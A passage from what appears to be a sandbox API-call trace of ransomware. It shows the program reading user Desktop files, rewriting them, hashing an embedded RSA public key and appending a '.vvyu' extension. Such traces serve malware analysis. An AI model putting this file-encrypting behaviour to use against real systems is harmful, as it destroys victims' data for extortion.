hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0184.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0184.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31180 | out: hHeap=0x6a0000) returned 1 [0184.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.041] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x8155, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x8155, lpOverlapped=0x0) returned 1 [0184.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.042] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x815a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.042] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.043] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.044] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.044] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.044] CloseHandle (hObject=0x584) returned 1 [0184.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.046] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\qC9h.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\qc9h.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\qC9h.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\qc9h.jpg.vvyu")) returned 1 [0184.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.049] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x962b0650, ftCreationTime.dwHighDateTime=0x1d89938, ftLastAccessTime.dwLowDateTime=0xa30dca0, ftLastAccessTime.dwHighDateTime=0x1d89b46, ftLastWriteTime.dwLowDateTime=0xa30dca0, ftLastWriteTime.dwHighDateTime=0x1d89b46, nFileSizeHigh=0x0, nFileSizeLow=0xe36b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ScQyRdBL.m4a", cAlternateFileName="")) returned 1 [0184.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31180 [0184.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31180 | out: hHeap=0x6a0000) returned 1 [0184.052] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ScQyRdBL.m4a") returned=".m4a" [0184.052] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ScQyRdBL.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\scqyrdbl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.052] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=58219) returned 1 [0184.052] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.055] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe345, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.055] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.058] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.058] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe36b, lpOverlapped=0x0) returned 1 [0184.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.059] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.060] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.060] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.060] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.060] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.060] GetLastError () returned 0x0 [0184.060] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.060] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.061] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.061] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.061] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe370) returned 0x2d43778 [0184.062] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31180 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d311c8 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.062] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e888 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.065] GetCurrentThreadId () returned 0x264 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36688 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.066] GetCurrentThreadId () returned 0x264 [0184.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 